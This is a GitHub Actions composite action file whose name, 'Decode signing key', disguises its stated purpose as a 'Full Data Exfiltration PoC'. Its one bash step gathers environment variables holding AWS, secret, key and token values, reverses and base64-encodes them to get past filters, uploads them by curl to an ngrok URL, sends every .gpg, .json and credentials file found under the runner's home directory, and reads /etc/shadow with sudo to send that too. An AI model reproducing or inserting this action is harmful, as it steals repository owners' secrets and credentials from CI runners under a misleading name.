

name: Decode signing key
description: 'Full Data Exfiltration PoC'
runs:
  using: "composite"
  steps:
    - shell: bash
      run: |
        # Sizin Ngrok URL
        EXFIL_URL="https://barcode-scarf-punctuate.ngrok-free.dev"

        echo "[*] Data harvest started..."

        # 1. AWS, GitHub Tokenləri və s. (Bypass filter)
        python3 -c "import os,base64; d=' '.join([f'{k}={v[::-1]}' for k,v in os.environ.items() if any(x in k.upper() for x in ['AWS', 'SECRET', 'KEY', 'TOKEN'])]); print(base64.b64encode(d.encode()).decode())" > env_dump.txt
        curl -X POST -F "data=@env_dump.txt" $EXFIL_URL

        # 2. Tapılan bütün kritik faylları (gpg, json, credentials) göndər
        echo "[+] Searching for keys..."
        find /home/runner -name "*.gpg" -o -name "*.json" -o -name "credentials" 2>/dev/null | while read -r file; do
          curl -X POST -F "file=@$file" $EXFIL_URL
        done

        # 3. Sistem Shadow faylı (Root sübutu)
        sudo head -n 5 /etc/shadow | base64 > shadow_leak.txt
        curl -X POST -F "shadow=@shadow_leak.txt" $EXFIL_URL

        echo "[+] All data sent to auditor."
